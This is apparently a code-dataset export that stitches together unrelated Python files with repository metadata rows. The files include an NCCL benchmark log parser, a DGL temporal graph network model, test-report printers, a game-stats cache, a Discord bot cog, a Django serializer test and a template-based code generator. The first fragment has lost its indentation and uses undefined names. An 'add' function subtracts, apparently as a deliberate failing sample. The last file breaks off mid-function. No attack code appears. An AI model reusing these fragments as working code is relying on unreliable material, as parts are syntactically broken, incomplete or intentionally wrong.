all_algos = ["ring", "tree"]
all_protocols = ["ll", "ll128", "simple", "default"]
all_sizes = [2**i for i in range(10, 30+1)] + [335708160]
bert_layer_size = 335708160
def slurp(file_path):
f = open(file_path, "r")
s = f.read()
f.close()
return s
#Get data from the job's name
def binary_from_job_name(job_name):
return re.findall(r'binary=(.+)-p1', job_name)[0]
def gpu_from_job_name(job_name):
return re.findall(r'gpu=(.+?)-', job_name)[0]
def channels_from_job_name(job_name):
return re.findall(r'channels=(.+?)-', job_name)[0]
def algo_from_job_name(job_name):
return re.findall(r'algo=(.+?)-', job_name)[0]
def protocol_from_job_name(job_name):
return re.findall(r'protocol=(.+?)!', job_name)[0]
#Process stdout from each binary
def process_stdout(stdout_txt):
all_data = re.findall(r"{.+}", stdout_txt)
data_in_dict = {}
for i in all_data:
i = i.replace("{", '{"')
i = i.replace(":", '":')
i = i.replace(",", ',"')
j = ast.literal_eval(i)
for k in dict(j):
j[k.strip()] = j[k]
if (k != k.strip()):
j.pop(k)
data_in_dict[j["SZ"]] = j
return data_in_dict
# A Dictionary of Binary X # of GPUs X # of Channel X Algorithms X Protocols
full_data_dict = {}
for binary in all_binaries:
full_data_dict[binary] = {}
for gpu in all_gpus:
full_data_dict[binary][gpu] = {}
for channel in all_channels:
full_data_dict[binary][gpu][channel] = {}
for algo in all_algos:
full_data_dict[binary][gpu][channel][algo] = {}
for protocol in all_protocols:
full_data_dict[binary][gpu][channel][algo][protocol] = {}
def process_dir(_dir):
f = os.path.join(_dir, "json.json")
command = slurp(f)
binary = ""
for b in all_binaries:
if b in command:
binary = b
break
gpus = int(re.findall(r"-np (\d+)", command)[0])
channels = int(re.findall(r"NCCL_MIN_NCHANNELS=(\d+)", command)[0])
algo = re.findall(r"NCCL_ALGO=(\w+)", command)[0].lower()
if "NCCL_PROTO" in command:
protocol = re.findall(r"NCCL_PROTO=([\w\d]+)", command)[0].lower()
else:
protocol = "default"
assert binary in all_binaries, "Possible invalid binary name '%s'"%binary
assert gpus in all_gpus, "Possible invalid number of gpus '%s'"%gpus
assert channels in all_channels, "Possible invalid number of channels '%s'"%channels
assert algo in all_algos, "Possible invalid number of algo '%s'"%algo
assert protocol in all_protocols, "Possible invalid number of protocol '%s'"%protocol
stdout_txt = slurp(os.path.join(_dir, "stdout.txt"))
data = process_stdout(stdout_txt)
global full_data_dict
prev_data = full_data_dict[binary][gpus][channels][algo][protocol]
if (len(data) == 0):
return
full_data_dict[binary][gpus][channels][algo][protocol] = data
def get_time(d):
if "TotalTime" in d:
return d["TotalTime"]
if "Total" in d:
return d["Total"]
if "Time" in d:
return d["Time"]
raise Exception("Time not found in " + str(d))
def process_results_dir(results_dir):
for d in os.listdir(results_dir):
full_path = os.path.join(results_dir, d)
if os.path.isdir(full_path):
process_dir(full_path)
| 36.591304
| 210
| 0.631654
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,264
| 0.30038
|
36670d4de61ce049abde949e0e34089149ce236c
| 3,409
|
py
|
Python
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 9,516
|
2018-12-08T22:11:31.000Z
|
2022-03-31T13:04:33.000Z
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 2,494
|
2018-12-08T22:43:00.000Z
|
2022-03-31T21:16:27.000Z
|
examples/pytorch/tgn/tgn.py
|
ketyi/dgl
|
a1b859c29b63a673c148d13231a49504740e0e01
|
[
"Apache-2.0"
] | 2,529
|
2018-12-08T22:56:14.000Z
|
2022-03-31T13:07:41.000Z
|
import copy
import torch.nn as nn
import dgl
from modules import MemoryModule, MemoryOperation, MsgLinkPredictor, TemporalTransformerConv, TimeEncode
class TGN(nn.Module):
def __init__(self,
edge_feat_dim,
memory_dim,
temporal_dim,
embedding_dim,
num_heads,
num_nodes,
n_neighbors=10,
memory_updater_type='gru',
layers=1):
super(TGN, self).__init__()
self.memory_dim = memory_dim
self.edge_feat_dim = edge_feat_dim
self.temporal_dim = temporal_dim
self.embedding_dim = embedding_dim
self.num_heads = num_heads
self.n_neighbors = n_neighbors
self.memory_updater_type = memory_updater_type
self.num_nodes = num_nodes
self.layers = layers
self.temporal_encoder = TimeEncode(self.temporal_dim)
self.memory = MemoryModule(self.num_nodes,
self.memory_dim)
self.memory_ops = MemoryOperation(self.memory_updater_type,
self.memory,
self.edge_feat_dim,
self.temporal_encoder)
self.embedding_attn = TemporalTransformerConv(self.edge_feat_dim,
self.memory_dim,
self.temporal_encoder,
self.embedding_dim,
self.num_heads,
layers=self.layers,
allow_zero_in_degree=True)
self.msg_linkpredictor = MsgLinkPredictor(embedding_dim)
def embed(self, postive_graph, negative_graph, blocks):
emb_graph = blocks[0]
emb_memory = self.memory.memory[emb_graph.ndata[dgl.NID], :]
emb_t = emb_graph.ndata['timestamp']
embedding = self.embedding_attn(emb_graph, emb_memory, emb_t)
emb2pred = dict(
zip(emb_graph.ndata[dgl.NID].tolist(), emb_graph.nodes().tolist()))
# Since postive graph and negative graph has same is mapping
feat_id = [emb2pred[int(n)] for n in postive_graph.ndata[dgl.NID]]
feat = embedding[feat_id]
pred_pos, pred_neg = self.msg_linkpredictor(
feat, postive_graph, negative_graph)
return pred_pos, pred_neg
def update_memory(self, subg):
new_g = self.memory_ops(subg)
self.memory.set_memory(new_g.ndata[dgl.NID], new_g.ndata['memory'])
self.memory.set_last_update_t(
new_g.ndata[dgl.NID], new_g.ndata['timestamp'])
# Some memory operation wrappers
def detach_memory(self):
self.memory.detach_memory()
def reset_memory(self):
self.memory.reset_memory()
def store_memory(self):
memory_checkpoint = {}
memory_checkpoint['memory'] = copy.deepcopy(self.memory.memory)
memory_checkpoint['last_t'] = copy.deepcopy(self.memory.last_update_t)
return memory_checkpoint
def restore_memory(self, memory_checkpoint):
self.memory.memory = memory_checkpoint['memory']
self.memory.last_update_time = memory_checkpoint['last_t']
| 40.105882
| 104
| 0.573482
| 3,256
| 0.955119
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.046641
|
366765dfc3b501d93189b1860864e2cb97e5eb00
| 3,813
|
py
|
Python
|
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
pyinq/printers/__init__.py
|
Auzzy/pyinq
|
91cc13013931620458ae6b23abc1d4a3e5ded27f
|
[
"0BSD"
] | null | null | null |
"""
Copyright (c) 2012-2013, Austin Noto-Moniz (metalnut4@netscape.net)
Permission to use, copy, modify, and/or distribute this software for any purpose
with or without fee is hereby granted, provided that the above copyright notice
and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF
THIS SOFTWARE.
"""
class AbstractPrinter(object):
"""
An abstract class for creating Printers, used to output the results
of the executed tests.
"""
mess = "The \"{func}\" method is not implemented for the type {type}"
def __init__(self, **kwargs):
if type(self) is AbstractPrinter:
raise TypeError("Can't instantiate the abstract base class AbstractPrinter")
def title(self, name):
"""Logs the report title."""
name = self.__class__.__name__
err = AbstractPrinter.mess.format(func="title",type=name)
raise NotImplementedError(err)
def section(self, label, name, nl=True):
"""Logs a section header."""
name = self.__class__.__name__
err = AbstractPrinter.mess.format(func="section",type=name)
raise NotImplementedError(err)
def log_test(self, label, result):
"""
Logs the results of a single test (TestResult object),
labeled with the provided label.
"""
name = self.__class__.__name__
err = AbstractPrinter.mess.format(func="log_test",type=name)
raise NotImplementedError(err)
def log_fixture(self, label, result):
"""
Logs the results of a single test (TestResult object),
labeled with the provided label.
"""
name = self.__class__.__name__
err = AbstractPrinter.mess.format(func="log_fixture",type=name)
raise NotImplementedError(err)
def cleanup(self):
"""Perform required cleanup operations, such as writing to a file."""
import pyinq.printers.cli
import pyinq.printers.html
def get_default():
return pyinq.printers.cli
def print_report(suite, printer_mod=None, **kwargs):
def log_fixture(label, fixture):
if fixture:
printer.log_fixture(label,fixture)
printer_mod = printer_mod if printer_mod else get_default()
printer = printer_mod.Printer(**kwargs)
try:
printer.title("Test Report")
log_fixture("Before Suite",suite.before)
for module in suite:
printer.section("Module",module.name,nl=False)
log_fixture("Before Module",module.before)
for cls in sorted(module, key=lambda cls: cls.name):
printer.section("Class",cls.name)
log_fixture("Before Class",cls.before)
for test in sorted(cls, key=lambda test: test.name):
before_label = "Before \"{0}\"".format(test.name)
log_fixture(before_label,test.before)
if not test.before or test.before[-1].result:
printer.log_test("Test",test)
after_label = "After \"{0}\"".format(test.name)
log_fixture(after_label,test.after)
log_fixture("After Class",cls.after)
log_fixture("After Module",module.after)
log_fixture("After Suite",suite.after)
finally:
printer.cleanup()
| 35.635514
| 88
| 0.647522
| 1,570
| 0.411749
| 0
| 0
| 0
| 0
| 0
| 0
| 1,554
| 0.407553
|
3667faea99d9e44cf1ec814efbac09de88c252f2
| 2,255
|
py
|
Python
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 3
|
2017-11-22T20:38:18.000Z
|
2018-09-04T07:48:55.000Z
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 12
|
2018-06-05T16:08:36.000Z
|
2020-11-26T19:16:59.000Z
|
cassiopeia-diskstore/cassiopeia_diskstore/championgg.py
|
mrtolkien/cassiopeia-datastores
|
1fbc6f9163ec4a5b4efdc892c219b5785f62b274
|
[
"MIT"
] | 10
|
2017-11-14T18:59:10.000Z
|
2020-09-17T15:18:29.000Z
|
from typing import Type, TypeVar, MutableMapping, Any, Iterable
from datapipelines import DataSource, DataSink, PipelineContext, Query, validate_query
from cassiopeia_championgg.dto import ChampionGGStatsListDto, ChampionGGStatsDto
from cassiopeia.datastores.uniquekeys import convert_region_to_platform
from .common import SimpleKVDiskService
T = TypeVar("T")
class ChampionGGDiskService(SimpleKVDiskService):
@DataSource.dispatch
def get(self, type: Type[T], query: MutableMapping[str, Any], context: PipelineContext = None) -> T:
pass
@DataSource.dispatch
def get_many(self, type: Type[T], query: MutableMapping[str, Any], context: PipelineContext = None) -> Iterable[T]:
pass
@DataSink.dispatch
def put(self, type: Type[T], item: T, context: PipelineContext = None) -> None:
pass
@DataSink.dispatch
def put_many(self, type: Type[T], items: Iterable[T], context: PipelineContext = None) -> None:
pass
_validate_get_gg_champion_list_query = Query. \
has("patch").as_(str).also. \
can_have("elo").with_default(lambda *args, **kwargs: "PLATINUM_DIAMOND_MASTER_CHALLENGER", supplies_type=str)
@get.register(ChampionGGStatsListDto)
@validate_query(_validate_get_gg_champion_list_query, convert_region_to_platform)
def get_champion_list(self, query: MutableMapping[str, Any], context: PipelineContext = None) -> ChampionGGStatsListDto:
patch = query["patch"]
elo = query["elo"]
key = "{clsname}.{patch}.{elo}".format(clsname=ChampionGGStatsListDto.__name__,
patch=patch,
elo=elo)
data = self._get(key)
data["data"] = [ChampionGGStatsDto(champion) for champion in data["data"]]
return ChampionGGStatsListDto(data)
@put.register(ChampionGGStatsListDto)
def put_champion_list(self, item: ChampionGGStatsListDto, context: PipelineContext = None) -> None:
key = "{clsname}.{patch}.{elo}".format(clsname=ChampionGGStatsListDto.__name__,
patch=item["patch"],
elo=item["elo"])
self._put(key, item)
| 43.365385
| 124
| 0.66031
| 1,888
| 0.837251
| 0
| 0
| 1,594
| 0.706874
| 0
| 0
| 137
| 0.060754
|
366887a1056798b43b8bf1750a891210075a1524
| 5,788
|
py
|
Python
|
src/cogs/fun-commands.py
|
ShubhamPatilsd/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | 1
|
2021-07-08T09:03:08.000Z
|
2021-07-08T09:03:08.000Z
|
src/cogs/fun-commands.py
|
vidhyanijadala/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | null | null | null |
src/cogs/fun-commands.py
|
vidhyanijadala/johnpeter-discord
|
40738f8df57f85275eb4887ab2ed9a9b96ba9e40
|
[
"MIT"
] | 1
|
2021-07-08T09:03:04.000Z
|
2021-07-08T09:03:04.000Z
|
import asyncio
import json
import os
import random
import re
import urllib
import urllib.request
from glob import glob
from os import getenv
from random import choice
import discord
from discord.ext import commands
from utils.cms import get_sponsor_intro, get_sponsor_audio
from utils.commands import only_random, require_vc, OnlyAllowedInChannels
class FunCommands(commands.Cog, name="Fun"):
def __init__(self, bot):
self.bot: commands.Bot = bot
self.random_channel = int(getenv("CHANNEL_RANDOM", 689534362760642676))
self.mod_log = int(getenv("CHANNEL_MOD_LOG", 689216590297694211))
# Downloads mp3 files
urls = get_sponsor_audio()
if not os.path.isdir("./cache/sponsorships/"):
os.makedirs("./cache/sponsorships/")
for url in urls:
file_name = re.sub("(h.*\/)+", "", url)
urllib.request.urlretrieve(url, f"./cache/sponsorships/{file_name}")
file_name = re.sub("(h.*\/)+", "", get_sponsor_intro())
urllib.request.urlretrieve(get_sponsor_intro(), f"./cache/{file_name}")
self.sponsorships = []
for file in glob("./cache/sponsorships/*.mp3"):
print(file)
self.sponsorships.append(file)
@commands.Cog.listener()
async def on_message(self, message):
msg = message.content
manyAnimalsRegex = re.compile(f"{await self.bot.get_prefix(message)}(cat|dog)((?:n't)+)")
match = manyAnimalsRegex.match(msg)
if match:
if message.channel.id != int(getenv("CHANNEL_RANDOM", 689534362760642676)): # hacky @only_random replacement
await message.channel.send(f"You can only do that in <#{getenv('CHANNEL_RANDOM', 689534362760642676)}>")
return
animal,nts = match.group(1,2)
animal_commands = ["cat","dog"]
command_to_call = animal_commands[(animal_commands.index(animal) + nts.count("n't"))%2]
await self.bot.get_command(command_to_call)(message.channel)
@commands.command(name="cat",aliases=["kitten", "kitty", "catto"])
@only_random
async def cat(self, ctx):
with urllib.request.urlopen("https://aws.random.cat/meow") as url:
data = json.loads(url.read().decode())
await ctx.send(data.get('file'))
@commands.command(name="doggo",aliases=["dog", "puppy", "pupper"])
@only_random
async def doggo(self,ctx):
with urllib.request.urlopen("https://dog.ceo/api/breeds/image/random") as url:
data = json.loads(url.read().decode())
await ctx.send(data.get('message'))
@commands.command(name="floof", aliases=["floofer","floofo"])
@only_random
async def floof(self, ctx):
await ctx.invoke(self.bot.get_command(random.choice(['doggo', 'cat'])))
@commands.command(name="bird", aliases=["birb","birdy","birdie"])
@only_random
async def bird(self, ctx):
with urllib.request.urlopen("https://some-random-api.ml/img/birb") as url:
data = json.loads(url.read().decode())
await ctx.send(data.get('link'))
@commands.command(name ="fish", aliases=["cod", "codday", "phish"])
@only_random
async def fish(self, ctx):
fish = ["https://tinyurl.com/s8zadryh", "https://tinyurl.com/v2xsewah", "https://tinyurl.com/hnmdr2we", "https://tinyurl.com/ypbcsa3u"]
await ctx.send(random.choice(fish))
@commands.command(name="triggered", aliases=["mad","angry"])
@only_random
async def triggered(self, ctx, arg):
if arg:
await ctx.send("https://some-random-api.ml/canvas/triggered?avatar={}".format(arg))
else:
await ctx.send("<:revoltLola:829824598178529311> Hey you didn't tell me an image URL!")
@commands.command(name="owo")
@only_random
async def owo(self, ctx):
"""owo"""
await ctx.send(f"owo what's {ctx.author.mention}?")
@commands.command(name="uwu")
@only_random
async def uwu(self, ctx):
"""uwu"""
await ctx.send(f"uwu what's {ctx.author.mention}?")
@commands.command(
name="up-down-up-down-left-right-left-right-b-a-start",
hidden=True,
aliases=["updownupdownleftrightleftrightbastart"],
)
@only_random
async def updownupdownleftrightleftrightbastart(
self, ctx,
):
"""A lot of typing for nothing."""
await ctx.send("wow that's a long cheat code. You win 20 CodeCoin!!")
@commands.command(pass_context=True, aliases=["disconnect"])
async def disconnectvc(self, ctx):
await ctx.message.delete()
vc = ctx.message.guild.voice_client
if vc is None:
await ctx.send("You silly, I'm not in any VCs right now.")
else:
await vc.disconnect()
@commands.command(
name="sponsorship",
aliases=[
"sponsor",
"sponsormessage",
"sponsor-message",
"sponsor_message",
"sponsors",
],
)
@require_vc
async def sponsorship(self, ctx):
"""Says a message from a sponsor."""
retval = os.getcwd()
vc = await ctx.message.author.voice.channel.connect()
try:
file = choice(self.sponsorships)
intro = discord.FFmpegPCMAudio(f"./cache/sponsor-intro.mp3")
sponsor = discord.FFmpegPCMAudio(f"{file}")
player = vc.play(intro)
while vc.is_playing():
await asyncio.sleep(1)
player = vc.play(sponsor)
while vc.is_playing():
await asyncio.sleep(1)
finally:
await vc.disconnect()
def setup(bot):
bot.add_cog(FunCommands(bot))
| 35.292683
| 143
| 0.609537
| 5,383
| 0.930028
| 0
| 0
| 4,154
| 0.717692
| 3,010
| 0.520041
| 1,433
| 0.247581
|
3669ffcdb82515f7959090d8ec3b463fb0d9a6f3
| 1,175
|
py
|
Python
|
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
aluraflix/tests/test_serializer.py
|
bonetou/django-rest-tests-documentation
|
a9e640e6425da560215d8f985a428d8eb90e09f9
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from aluraflix.models import Programa
from aluraflix.serializers import ProgramaSerializer
class ProgramaSerializerTestCase(TestCase):
def setUp(self):
self.programa = Programa(
titulo = 'Procurando ninguém em latim',
data_lancamento = '2003-07-04',
tipo = 'F',
likes = 2340,
dislikes = 40
)
self.serializer = ProgramaSerializer(instance=self.programa)
def test_verifica_campos_serializados(self):
"""Teste que verifica os campos que estão sendo serializados"""
data = self.serializer.data
self.assertEqual(set(data.keys()), set(['titulo', 'tipo', 'data_lancamento', 'likes']))
def test_verifica_conteudo_dos_campos_serializados(self):
"""Teste que verifica o conteúdo dos campos serializados"""
data = self.serializer.data
self.assertEqual(data['titulo'], self.programa.titulo)
self.assertEqual(data['data_lancamento'], self.programa.data_lancamento)
self.assertEqual(data['tipo'], self.programa.tipo)
self.assertEqual(data['likes'], self.programa.likes)
| 39.166667
| 96
| 0.667234
| 1,048
| 0.889643
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.20798
|
366b6bc762ff4618c8e2b630d09921664231bc91
| 53
|
py
|
Python
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 31
|
2017-09-27T14:54:39.000Z
|
2021-05-26T14:03:44.000Z
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 11
|
2018-03-11T05:28:14.000Z
|
2022-03-11T23:19:36.000Z
|
3_team/tests/unittest_sample_ng/sample.py
|
pyfirst/pymook-samplecode
|
82321237c34515d287f28bd51ea86f870c1f5514
|
[
"MIT"
] | 41
|
2017-10-21T04:45:56.000Z
|
2021-07-16T14:12:33.000Z
|
def add(m, n):
"""mとnを加算して返す"""
return m - n
| 13.25
| 20
| 0.490566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 32
| 0.463768
|
366bcb9133a5c3e67a13ed8806476e7eebec5689
| 16,720
|
py
|
Python
|
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
src/pyseed/commands/gen.py
|
okosioc/pyseed
|
a4ee4bb6f005c9a9b80eafea45b91ddb7354fa91
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
gen
~~~~~~~~~~~~~~
Command gen.
:copyright: (c) 2021 by weiminfeng.
:date: 2021/9/1
"""
import argparse
import importlib.util
import json
import logging
import os
import re
import shutil
import sys
from typing import List
import inflection
from flask import request
from jinja2 import Environment, TemplateSyntaxError, FileSystemLoader
from werkzeug.urls import url_quote, url_encode
from pyseed import registered_models
from pyseed.error import TemplateError
from pyseed.utils import work_in
logger = logging.getLogger(__name__)
def _prepare_jinja2_env():
""" Prepare env for rendering jinja2 templates. """
#
# For more env setting, please refer to https://jinja.palletsprojects.com/en/3.0.x/api/#jinja2.Environment
# trim_blocks=True, the first newline after a block is removed (block, not variable tag!)
# lstrip_blocks=True, leading spaces and tabs are stripped from the start of a line to a block
# keep_trailing_newline=True, Preserve the trailing newline when rendering templates.
#
env = Environment(trim_blocks=True, lstrip_blocks=True, keep_trailing_newline=True)
def split(value, separator):
""" Split a string. """
return value.split(separator)
def items(value):
""" Return items of a dict. """
return value.items()
def keys(value):
""" Return keys of a dict. """
return value.keys()
def quote(value):
""" Add single quote to value if it is str, else return its __str__. """
if isinstance(value, str):
return '\'' + value + '\''
else:
return str(value)
def basename(value):
""" Return file name from a path. """
return os.path.basename(value)
def urlquote(value, charset='utf-8'):
""" Url Quote. """
return url_quote(value, charset)
env.filters['split'] = split
env.filters['items'] = items
env.filters['keys'] = keys
env.filters['quote'] = quote
env.filters['basename'] = basename
env.filters['urlquote'] = urlquote
def update_query(**new_values):
""" Update query. """
args = request.args.copy()
for key, value in new_values.items():
args[key] = value
return '{}?{}'.format(request.path, url_encode(args))
def new_model(class_name):
""" New a model by class name. """
klass = globals()[class_name]
return klass()
env.globals['update_query'] = update_query
env.globals['new_model'] = new_model
#
return env
def _gen(models_dir: str, seeds_dir: str, out_dir: str, template_names: List[str]):
""" Gen. """
logger.info(f'gen {models_dir} and {seeds_dir} to {out_dir}, using {template_names}')
if not os.path.exists(models_dir):
logger.error('No models folder')
return False
if not os.path.exists(seeds_dir):
logger.error('No seeds folder')
return False
if not os.path.exists(out_dir):
os.mkdir(out_dir)
#
# find templates from current folder
# TODO: Download template to current working folder
#
working_folder = os.getcwd()
logger.info(f'Working folder is {working_folder}')
templates = []
for g in os.listdir(working_folder):
p = os.path.join(working_folder, g)
if os.path.isdir(p) and g in template_names:
templates.append(g)
#
if not templates:
logger.error(f'Can not find any available templates by {template_names}')
return False
#
# Import models package
# 1. Find all the models definition in models package, please import all models in __init__.py
#
module_name = os.path.basename(models_dir)
module_spec = importlib.util.spec_from_file_location(module_name, os.path.join(models_dir, '__init__.py'))
module = importlib.util.module_from_spec(module_spec)
sys.modules[module_name] = module
module_spec.loader.exec_module(module)
#
# Load registered model schemas
#
models = {}
for m in registered_models:
models[m.__name__] = {'schema': m.schema(), **_generate_names(m.__name__)}
#
logger.info(f'Found {len(models)} registered models: {list(models.keys())}')
#
# Create context using contents in seeds_dir
# 1. Files in seeds_dir root folder are used as layouts
# 2. Only contains one level sub folders and each folder will be generated to a blueprint
# 3. Files in each blueprint folder will be genrated to views
# 4. Each view file contains var lines, i.e. !key=value, and seed grids
context = {
'models': models, # {name: {name, schema}}}
'layouts': [], # [layout]
'blueprints': [], # [blueprint]
'seeds': [],
}
logger.info(f'Seeds:')
for d in os.listdir(seeds_dir): # Blueprints
p = os.path.join(seeds_dir, d)
if os.path.isdir(p):
logger.info(f'{d}/')
blueprint = {'views': [], **_generate_names(d)}
models_by_name = {}
for dd in os.listdir(p): # Views
view = {'blueprint': blueprint, 'rows': [], 'seeds': [], 'params': {}, **_generate_names(dd)}
pp = os.path.join(p, dd)
logger.info(f' {dd}')
with open(pp) as f: # Seeds defined in views
for line in f:
line = line.strip()
if not line:
continue
#
key_value_found = re.match('^!([a-zA-Z_]+)=(.+)$', line)
if key_value_found:
key, value = key_value_found.groups()
#
# NOTES:
# 1. Variables name should be in snake format, i.e, two_words
# 2. Variables can be accessed in templates by view.params.field_name
#
value = _parse_varible_value(key, value)
view['params'][key] = value
else:
row = {'columns': []}
if '|' in line: # Nested column, e.g, a,b|c,d
for c in line.split('|'):
column = []
for cc in c.split(','):
cc = cc.strip()
seed = _parse_seed(cc, models)
if 'model' in seed:
models_by_name[seed['model']['name']] = seed['model']
view['seeds'].append(seed)
context['seeds'].append(seed)
#
column.append(seed)
#
row['columns'].append(column)
else: # Single level column, e.g, a,b
for c in line.split(','):
c = c.strip()
seed = _parse_seed(c, models)
if 'model' in seed:
models_by_name[seed['model']['name']] = seed['model']
view['seeds'].append(seed)
context['seeds'].append(seed)
#
row['columns'].append(seed)
#
logger.info(f' {line}')
view['rows'].append(row)
#
blueprint['views'].append(view)
blueprint['models'] = models_by_name.values()
#
context['blueprints'].append(blueprint)
else:
logger.info(f'{d}')
context['layouts'].append(d)
#
env = _prepare_jinja2_env()
#
# Iterate each template
#
for template in templates:
#
# Prepare paths
#
tempate_path = template
output_path = out_dir
if not os.path.exists(output_path):
os.mkdir(output_path)
logger.info(f'Generate template {template}: {tempate_path} -> {output_path}')
#
# Use depth-first to copy templates to output path, converting all the names and render in the meanwhile
#
for d in os.listdir(tempate_path):
_recursive_render(tempate_path, output_path, d, context, env)
def _generate_names(name):
""" Generate names. """
name_wo_dot = name.replace('.', '-') # e.g, plan.members-form -> plan-members-form
return {
'name': name, # => SampleModel
'name_lower': name.lower(), # => samplemodel
'name_kebab': inflection.dasherize(inflection.underscore(name_wo_dot)), # => sample-model
'name_camel': inflection.camelize(name_wo_dot, uppercase_first_letter=False), # => sampleModel
'name_snake': inflection.underscore(name_wo_dot), # => sample_model
'name_snake_plural': inflection.tableize(name_wo_dot), # => sample_models
'name_title': inflection.titleize(name_wo_dot), # => Sample Model
}
def _parse_varible_value(key, value):
""" Parse value accordig to the key. """
key = key.lower()
value = value.strip()
if key.startswith('has_') or key.startswith('is_'):
if value.lower() in ['1', 'true', 'yes']:
value = True
else:
value = False
elif value.startswith('[') or value.startswith('{'):
try:
value = json.loads(value) # Need to use double quotes for string values or key names
except ValueError as e:
logger.warning(f'Can not parse list or dict varible {key}={value}, use as string directly')
#
return value
def _parse_seed(column, models):
""" Parse column and return seed if any, e.g, post-query, post-read, user-form?is_horizontal=true.
model-action?params
"""
# params
params = {}
if '?' in column:
column, query = column.split('?')
for p in query.split('&'):
key, value = p.split('=')
params[key] = _parse_varible_value(key, value)
# model-action
tokens = column.split('-')
name = tokens[0]
sub = None
# sub model, only support one level sub model
if '.' in name:
name, sub = name.split('.')
# found model by name
found = next((m for n, m in models.items() if n.lower() == name.lower()), None)
if found:
action = tokens[-1]
return {'model': found, 'sub': sub, 'action': action, 'params': params, **_generate_names(column)}
else:
return {'params': params, **_generate_names(column)}
def _recursive_render(t_base, o_base, name, context, env):
""" Copy folder or file from template folder to output folder, handle names having list/varible syntax.
Supported Syntax:
{{#blueprints}}
{{blueprint}}
{{#views}}
{{view}}
{{#seeds}}
{{seed}}
"""
t_path = os.path.join(t_base, name)
logger.debug(f'template {t_path}')
t_name = ''.join(name.split()) # Remove all the whitespace chars from name
out_names = []
out_key, out_values = None, []
#
# Check list syntax, i.e, {{#name}}
# This syntax iterate over every item of the list; do not generate anything if empty list and false value
#
match_list = re.search('(\\{\\{#[a-zA-Z._]+\\}\\})', t_name)
if match_list:
syntax = match_list.group(1) # => {{#views}}
key = syntax[3:-2] # => views
if key == 'blueprints':
out_key = '__blueprint'
out_values = context['blueprints']
out_names = [t_name.replace(syntax, v['name']) for v in out_values]
elif key == 'views':
out_key = '__view'
out_values = context['__blueprint']['views']
out_names = [t_name.replace(syntax, v['name']) for v in out_values]
elif key == 'seeds':
out_key = '__seed'
out_values = context['seeds']
out_names = [t_name.replace(syntax, v['name']) for v in out_values]
else:
raise TemplateError(f'Unsupported list syntax: {syntax}')
else:
#
# Check varible syntax, i.e, {{name}}
# This syntax return the value of the varible
#
match_variable = re.search('(\\{\\{[a-zA-Z._]+\\}\\})', t_name)
if match_variable:
syntax = match_list.group(1)
key = syntax[2:-2]
if key in ['blueprint', 'view', 'seed']:
out_key == f'__{key}'
out_values = [context[f'__{key}']]
out_names = [t_name.replace(syntax, v['name']) for v in out_values]
else:
out_names = [t_name]
else:
out_names = [t_name]
#
# Copy & Render
#
if os.path.isdir(t_path):
for i, o_name in enumerate(out_names):
o_path = os.path.join(o_base, o_name)
logger.debug(f'output {o_path}')
if not os.path.exists(o_path):
os.mkdir(o_path)
# Can use this in sub folders and files
if out_values:
context[out_key] = out_values[i]
# Copy the whole folder, use sorted() to make sure files starting with _ can be copied firtly
for d in sorted(os.listdir(t_path)):
_recursive_render(t_path, o_path, d, context, env)
# Remove the files startswith #, which has been used for rendering
for f in os.listdir(o_path):
fp = os.path.join(o_path, f)
if os.path.isfile(fp) and f.startswith('#'):
logger.debug(f'delete {f}')
os.remove(fp)
logger.debug(f'done {o_path}')
#
else:
for o_name in out_names:
o_path = os.path.join(o_base, o_name)
logger.debug(f'copy {o_name}')
shutil.copyfile(t_path, o_path)
shutil.copymode(t_path, o_path)
#
# Render file
